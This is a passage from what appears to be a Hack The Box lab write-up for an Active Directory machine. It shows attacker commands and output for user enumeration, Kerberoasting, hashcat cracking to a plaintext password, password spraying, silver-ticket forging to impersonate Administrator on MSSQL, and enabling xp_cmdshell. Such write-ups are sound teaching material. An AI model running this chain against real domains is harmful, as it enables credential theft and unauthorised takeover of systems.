SMB 10.129.12.119 445 DC1 ----- ----------- ------
SMB 10.129.12.119 445 DC1 ADMIN$ Remote Admin
SMB 10.129.12.119 445 DC1 C$ Default share
SMB 10.129.12.119 445 DC1 HR
SMB 10.129.12.119 445 DC1 IPC$ READ Remote IPC
SMB 10.129.12.119 445 DC1 IT
SMB 10.129.12.119 445 DC1 NETLOGON READ Logon server share
SMB 10.129.12.119 445 DC1 Public READ
SMB 10.129.12.119 445 DC1 Sales
SMB 10.129.12.119 445 DC1 SYSVOL READ Logon server sharefirst request a tgt for the user either with kinit or with getTGT.py
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ kinit ksimpson@SCRM.LOCAL
Password for ksimpson@SCRM.LOCAL:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: ksimpson@SCRM.LOCAL
Valid starting Expires Service principal
06/11/26 05:08:28 06/11/26 15:08:28 krbtgt/SCRM.LOCAL@SCRM.LOCAL
renew until 06/12/26 05:08:25then export that ticket to the KRB5CCNAME variable and as you can see we can connect using it so lets see what we can do with that share
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ export KRB5CCNAME=/tmp/krb5cc_1000
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u ksimpson -k --use-kcache
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] SCRM.LOCAL\ksimpson from ccacheand as you can see we get in, just notice that we can't use the IP to connect cause Kerberos SPNs are built around hostnames not IP so you can't ask for a TGS like this cifs/10.129.12.119@SCRM.LOCAL cause there is no SPN registered to it but there is one registered to cifs/dc1.scrm.local@SCRM.LOCAL
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ smbclient.py scrm.local/ksimpson:ksimpson@10.129.12.119 -k -no-pass
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ smbclient.py scrm.local/ksimpson:ksimpson@dc1.scrm.local -k -no-pass
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
#and we get a file called Network Security changes in the public share
# use Public
ls# ls
drw-rw-rw- 0 Thu Nov 4 15:23:19 2021 .
drw-rw-rw- 0 Thu Nov 4 15:23:19 2021 ..
-rw-rw-rw- 630106 Fri Nov 5 10:45:07 2021 Network Security Changes.pdf
# get Network Security Changes.pdf
#it is a notice for all employees about changes in the network security measures
one thing that is interesting the hacker got access to the DB and got a password for users in the HR and because passwords aren't stored as plain text in the DB so one of those users has a weak password that we might be able to crack so let's try to find which user it is
SQLSVC Account
and we got a list of users using ksimpson user
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u ksimpson -k --use-kcache --users
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] SCRM.LOCAL\ksimpson from ccache
SMB 10.129.12.119 445 DC1 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.12.119 445 DC1 administrator 2021-11-08 00:35:59 0 Built-in account for administering the computer/domain
SMB 10.129.12.119 445 DC1 Guest < never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.12.119 445 DC1 krbtgt 2020-01-26 19:15:47 0 Key Distribution Center Service Account
SMB 10.129.12.119 445 DC1 tstar 2021-11-05 14:55:51 0
SMB 10.129.12.119 445 DC1 asmith 2020-02-08 22:29:01 0
SMB 10.129.12.119 445 DC1 sjenkins 2020-02-08 23:11:26 0
SMB 10.129.12.119 445 DC1 sdonington 2020-02-08 23:11:54 0
SMB 10.129.12.119 445 DC1 backupsvc 2021-10-31 20:49:04 0 Backup system service
SMB 10.129.12.119 445 DC1 jhall 2021-10-31 21:09:23 0
SMB 10.129.12.119 445 DC1 rsmith 2021-10-31 21:09:54 0
SMB 10.129.12.119 445 DC1 ehooker 2021-11-03 19:02:41 0
SMB 10.129.12.119 445 DC1 khicks 2021-11-01 15:36:08 0
SMB 10.129.12.119 445 DC1 sqlsvc 2021-11-03 16:32:02 0 SQL server
SMB 10.129.12.119 445 DC1 miscsvc 2021-11-03 18:07:47 0 Miscellaneous scheduled tasks and services
SMB 10.129.12.119 445 DC1 ksimpson 2021-11-04 00:30:57 1
SMB 10.129.12.119 445 DC1 [*] Enumerated 15 local users: SCRMnow using this list with kerbrute for asrep roast didn't get anything back so I moved to Kerberoast instead and we got the the user sqlsvc is vulnerable to Kerberoast and we got its hash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip 10.129.12.119 'scrm.local/ksimpson:ksimpson' -k -dc-host dc1.scrm.local
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 09:32:02.351452 2026-06-11 04:18:54.095188
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 09:32:02.351452 2026-06-11 04:18:54.095188
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ cat kerberoastables.txt
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$2e54b15a86bcb75aaeb975de8b01eeaf$2d4462b65e5c4a04063726c721ed0b951e63789ee3769ba146cac39de036f413e63e6c93db1ceb7c7d4fed177976ab6e3521f738b3de907c00189628004e55a9cfb06c5cace4e0a2f459495f49b98aa18d8aacb723356416372ffd19b7f3b0f34dac60315a1159d806f0605b48cf53308adf7cde286b492bc79d94fc3f4e59899a9c38144c9b6ce3bf90d2c3851363380bfd4ff000be8743dddc32b2b5fde816cff867ef432144c31d8948cceafaa64f7cfccd7d2fcc08103d89e34df6a1136bd6f88ed7447757d2e23ad9b859618a62d5a0d0946325168dbc2103f8314864ae688c8ea9eaff070aa12bc4ff5695c4cf5d8153a803b7892d421078b01db72bd63a74f141c66719b364d7b97b3081d537bb6926a09447eca5b77a26e5177f5931c943986d3bd478ba149127a69f1c2756578015eef44779d0ec25c6771e58c52ac77dd647e5617b1cfb6480c60eb49a008cc9a026fec969e13a01c3729bca4970acb2ec2bbc0e65ac81cfe25115f447f0f8a7bfb7f4a972005871a5abc5e53ed19336a42d6435490eb6a77bf88d0f4d1d6556844a12a92ee49d041236e654038aab0877bf23130e82679c6ad8b829bf6359669e1192fd96615f62912cfdf7e862a6d24436c846052c2f4dfa2ab186fde7609a51e14986d3380f16729016f7e83920395fa3882bc3d1d8406d2c6875413a46d900fc125c17c8f994fc63b6d0e3f7c4f25efeaf1fb2be6146c0aff86e0c502e1e101829fb5e312d52c8dffda6ccea5c8369a045f1d4405ae73795d63b74bdbfca3f447066b725cf1b779c5a0b3a84a4ee092ba632bc19cc0354ff04e18dd86bee01ea4f33a7f0ce78fc0f6210672de3655aa22b00b4900a3de7787ddbeac200064a37ec489b33126224ce3186363be3588932f96be10b4924224589f6b084523a3f0a43ff0665edf053e3648f771733548174af11075aa9cda7a8e278637898f364f0c688a93e3c20235849aa1d84fdb8697c7291360bddb2ad82281ddfcd416b59003905d76d0edb345cff3e85b73b7994695d642a633c3aef736f319f8e14247abe03880358eee5af390c50612de5b5dc8b327a1996d24f4fe455af70410995d894d1f2305f8e3b976a4efc2528804aa36a9595cc3d8a7ae7b1f25ab1f7755d362c0a2a0c252c050a43202d1abd62f3f9d188e128f03534e9682495fcfb0cef3d71b8b683292898894aa0f9d0aff558d4236d8a6a56f3d402132ccde334ac7b82b1f139ae1208ea49315b1d3146efedf01b675fbecea79bbbb6ba988aec7b82ad10bebf9d9b15cfb509f76a22dba156c7fbcb4fb13b9f86c624c51de2903dbd8ee2ffccca2f895bde8796e101d3ab9c3148891df41880cee49746f85463fac9ff1d4fa12b34b29db4d10d92c855e64dfdb34d825a5d1bcb094ed513cd755098c7e55dbc573792bd6dand as you can see using hashcat we can crack it and we got the password
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ hashcat -a 0 kerberoastables.txt /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2-382-g2d71af371) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-haswell-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 1453/2907 MB (512 MB allocatable), 2MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 512 MB (1950 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$2e54b15a86bcb75aaeb975de8b01eeaf$2d4462b65e5c4a04063726c721ed0b951e63789ee3769ba146cac39de036f413e63e6c93db1ceb7c7d4fed177976ab6e3521f738b3de907c00189628004e55a9cfb06c5cace4e0a2f459495f49b98aa18d8aacb723356416372ffd19b7f3b0f34dac60315a1159d806f0605b48cf53308adf7cde286b492bc79d94fc3f4e59899a9c38144c9b6ce3bf90d2c3851363380bfd4ff000be8743dddc32b2b5fde816cff867ef432144c31d8948cceafaa64f7cfccd7d2fcc08103d89e34df6a1136bd6f88ed7447757d2e23ad9b859618a62d5a0d0946325168dbc2103f8314864ae688c8ea9eaff070aa12bc4ff5695c4cf5d8153a803b7892d421078b01db72bd63a74f141c66719b364d7b97b3081d537bb6926a09447eca5b77a26e5177f5931c943986d3bd478ba149127a69f1c2756578015eef44779d0ec25c6771e58c52ac77dd647e5617b1cfb6480c60eb49a008cc9a026fec969e13a01c3729bca4970acb2ec2bbc0e65ac81cfe25115f447f0f8a7bfb7f4a972005871a5abc5e53ed19336a42d6435490eb6a77bf88d0f4d1d6556844a12a92ee49d041236e654038aab0877bf23130e82679c6ad8b829bf6359669e1192fd96615f62912cfdf7e862a6d24436c846052c2f4dfa2ab186fde7609a51e14986d3380f16729016f7e83920395fa3882bc3d1d8406d2c6875413a46d900fc125c17c8f994fc63b6d0e3f7c4f25efeaf1fb2be6146c0aff86e0c502e1e101829fb5e312d52c8dffda6ccea5c8369a045f1d4405ae73795d63b74bdbfca3f447066b725cf1b779c5a0b3a84a4ee092ba632bc19cc0354ff04e18dd86bee01ea4f33a7f0ce78fc0f6210672de3655aa22b00b4900a3de7787ddbeac200064a37ec489b33126224ce3186363be3588932f96be10b4924224589f6b084523a3f0a43ff0665edf053e3648f771733548174af11075aa9cda7a8e278637898f364f0c688a93e3c20235849aa1d84fdb8697c7291360bddb2ad82281ddfcd416b59003905d76d0edb345cff3e85b73b7994695d642a633c3aef736f319f8e14247abe03880358eee5af390c50612de5b5dc8b327a1996d24f4fe455af70410995d894d1f2305f8e3b976a4efc2528804aa36a9595cc3d8a7ae7b1f25ab1f7755d362c0a2a0c252c050a43202d1abd62f3f9d188e128f03534e9682495fcfb0cef3d71b8b683292898894aa0f9d0aff558d4236d8a6a56f3d402132ccde334ac7b82b1f139ae1208ea49315b1d3146efedf01b675fbecea79bbbb6ba988aec7b82ad10bebf9d9b15cfb509f76a22dba156c7fbcb4fb13b9f86c624c51de2903dbd8ee2ffccca2f895bde8796e101d3ab9c3148891df41880cee49746f85463fac9ff1d4fa12b34b29db4d10d92c855e64dfdb34d825a5d1bcb094ed513cd755098c7e55dbc573792bd6d:Pegasus60
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$2...92bd6d
Time.Started.....: Thu Jun 11 05:38:55 2026 (15 secs)
Time.Estimated...: Thu Jun 11 05:39:10 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 742.7 kH/s (2.02ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10729472/14344385 (74.80%)
Rejected.........: 0/10729472 (0.00%)
Restore.Point....: 10727424/14344385 (74.78%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Petey55 -> Pearson1
Hardware.Mon.#01.: Util: 90%
Started: Thu Jun 11 05:38:49 2026
Stopped: Thu Jun 11 05:39:11 2026and as you can see the user is valid for SMB but not for mssql cause as we know it is disabled, for now so maybe they disabled mssql but the user still got access to one of the SMB shares
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u sqlsvc -p Pegasus60 -k
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] scrm.local\sqlsvc:Pegasus60
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc mssql 10.129.12.119 -u sqlsvc -p Pegasus60 -k
MSSQL 10.129.12.119 1433 None [*] None (name:10.129.12.119) (domain:) (EncryptionReq:False) (NTLM:False)
MSSQL 10.129.12.119 1433 None [-] None\sqlsvc:Pegasus60and nothing came back on the shares part
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u sqlsvc -p Pegasus60 -k --shares
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [+] scrm.local\sqlsvc:Pegasus60
SMB 10.129.12.119 445 DC1 [*] Enumerated shares
SMB 10.129.12.119 445 DC1 Share Permissions Remark
SMB 10.129.12.119 445 DC1 ----- ----------- ------
SMB 10.129.12.119 445 DC1 ADMIN$ Remote Admin
SMB 10.129.12.119 445 DC1 C$ Default share
SMB 10.129.12.119 445 DC1 HR
SMB 10.129.12.119 445 DC1 IPC$ READ Remote IPC
SMB 10.129.12.119 445 DC1 IT
SMB 10.129.12.119 445 DC1 NETLOGON READ Logon server share
SMB 10.129.12.119 445 DC1 Public READ
SMB 10.129.12.119 445 DC1 Sales
SMB 10.129.12.119 445 DC1 SYSVOL READ Logon server sharelast thing I need to try is password spary this password for all users, cause usually there is a certain user who setup this account svcsql and maybe he reused the password and remeber this quote from the file
so we have removed all access to the SQL service for everyone apart from network administrators.
so maybe they removed access to the sqlsvc account but the network admin itself uses the same password
and we don't get any hits for that part
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc smb 10.129.12.119 -u users.txt -p Pegasus60 -k --continue-on-success
SMB 10.129.12.119 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.12.119 445 DC1 [-] scrm.local\administrator:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\Guest:Pegasus60 KDC_ERR_CLIENT_REVOKED
SMB 10.129.12.119 445 DC1 [-] scrm.local\krbtgt:Pegasus60 KDC_ERR_CLIENT_REVOKED
SMB 10.129.12.119 445 DC1 [-] scrm.local\tstar:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\asmith:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\sjenkins:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\sdonington:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\backupsvc:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\jhall:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\rsmith:Pegasus60 KDC_ERR_CLIENT_REVOKED
SMB 10.129.12.119 445 DC1 [-] scrm.local\ehooker:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\khicks:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [+] scrm.local\sqlsvc:Pegasus60
SMB 10.129.12.119 445 DC1 [-] scrm.local\miscsvc:Pegasus60 KDC_ERR_PREAUTH_FAILED
SMB 10.129.12.119 445 DC1 [-] scrm.local\ksimpson:Pegasus60 KDC_ERR_PREAUTH_FAILEDand this user is valid for ldap also, so lets get bloodhound running
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ nxc ldap 10.129.12.119 -u sqlsvc -p Pegasus60 -k
LDAP 10.129.12.119 389 DC1 [*] None (name:DC1) (domain:scrm.local) (signing:None) (channel binding:Never) (NTLM:False)
LDAP 10.129.12.119 389 DC1 [+] scrm.local\sqlsvc:Pegasus60so get a ticket first for that user and use it with rusthound to collect data
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ kinit sqlsvc@SCRM.LOCAL
Password for sqlsvc@SCRM.LOCAL:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: sqlsvc@SCRM.LOCAL
Valid starting Expires Service principal
06/11/26 05:48:36 06/11/26 15:48:36 krbtgt/SCRM.LOCAL@SCRM.LOCAL
renew until 06/12/26 05:48:33
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ export KRB5CCNAME=/tmp/krb5cc_1000
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ rusthound -d scrm.local -i 10.129.12.119 -u sqlsvc -p Pegasus60 -z -f dc1.scrm.local -k
---------------------------------------------------
Initializing RustHound at 05:49:04 on 06/11/26
Powered by g0h4n from OpenCyber
---------------------------------------------------
[2026-06-11T12:49:04Z INFO rusthound] Verbosity level: Info
[2026-06-11T12:49:05Z INFO rusthound::ldap] Connected to SCRM.LOCAL Active Directory!
[2026-06-11T12:49:05Z INFO rusthound::ldap] Starting data collection...
[2026-06-11T12:49:08Z INFO rusthound::ldap] All data collected for NamingContext DC=scrm,DC=local
[2026-06-11T12:49:08Z INFO rusthound::json::parser] Starting the LDAP objects parsing...
[2026-06-11T12:49:08Z INFO rusthound::json::parser] Parsing LDAP objects finished!
[2026-06-11T12:49:08Z INFO rusthound::json::checker] Starting checker to replace some values...
[2026-06-11T12:49:08Z INFO rusthound::json::checker] Checking and replacing some values finished!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 16 users parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 70 groups parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 2 computers parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 6 ous parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 1 domains parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 6 gpos parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] 21 containers parsed!
[2026-06-11T12:49:08Z INFO rusthound::json::maker] .//20260611054908_scrm-local_rusthound.zip created!
RustHound Enumeration Completed at 05:49:08 on 06/11/26! Happy Graphing!looking at the data I found something very interesting, the LDAP actually shows that we still have execution privilege as sql admin over the mssql server but we can't access it why? I looked at the groups and I found myself in a group called NOACCESS which is a way IT uses to enforce a GPO quickly on a bunch of users so if we have write over our account we can remove our selves from this group and then we can use the MSSQL normally
List what we can wrtie as this user sqlsvc
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ bloodyAD -k --host dc1.scrm.local --domain scrm.local -i 10.129.12.119 -u sqlsvc -p Pegasus60 get writable --detail
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=scrm,DC=local
url: WRITE
wWWHomePage: WRITE
distinguishedName: CN=SqlSvc,OU=Service Accounts,DC=scrm,DC=local
thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
wWWHomePage: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
distinguishedName: DC=scrm.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=scrm,DC=local
dnsNode: CREATE_CHILD
dnsZoneScopeContainer: CREATE_CHILD
distinguishedName: DC=_msdcs.scrm.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=scrm,DC=local
dnsNode: CREATE_CHILD
dnsZoneScopeContainer: CREATE_CHILDand as you can see we can't do that so lets move on to the next attempt
Ticket Forging
for you to understand this next attack you'll need some context about how Kerberos works and I have multiple blogs talking about this like Kerberoasting and ASREP-Roasting but lets wrap it here In normal Kerberos flow:
- Client asks KDC for a TGS (service ticket)
- KDC encrypts the TGS with the service account's password hash
- Client presents TGS to the service
but now we got the service account's password which is the sqlsvc account and we can convert it to NTLM hash easily
now the issue is that the service itself validates the ticket, not the KDC, the service just decrypts the TGS using its own password hash and trusts whatever's inside so we can forge a ticket to ourselves putting any username inside and the KDC will never be invoked, so when we connect with the forged ticket mssql will decrypt it with its hash and trusts it directly
Just so you know this is a kerberos weakness not an mssql weakness cause anyother service in this case would be vulnerable to the exact same attack so lets try and do it
for this to work we'll need
- the SPN for the service account
- the Service password's hash
- the domain SID
I will get the SID using Bloodhound S-1-5-21-2743207045-1827831105-2542523200 and lets get the NTLM hash
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ printf '%s' "Pegasus60" | iconv -t utf16le | openssl dgst -provider legacy -provider default -md4
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05or you can simply use any NTLM generator online
and we already have the SPN from the kerberoasting results
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 09:32:02.351452 2026-06-11 04:18:54.095188
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 09:32:02.351452 2026-06-11 04:18:54.095188the highest user in this case is administrator so lets forge his identity
and we got the forged ticket so lets test it now
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 Administrator
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccacheand we got in as administrator on mssql, (just so you know the administrator privileges here are limited to MSSQL only)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ export KRB5CCNAME=Administrator.ccache
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ mssqlclient.py -k dc1.scrm.local
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>and as you can see we can run commands on the system
SQL (SCRM\administrator dbo@master)> enable_xp_cmdshell
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULLLooking at this we've got SeImpersonatePrivilege as sqlsvc so keep that in mind if we got nothing we'll be back for Juicy Potato
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
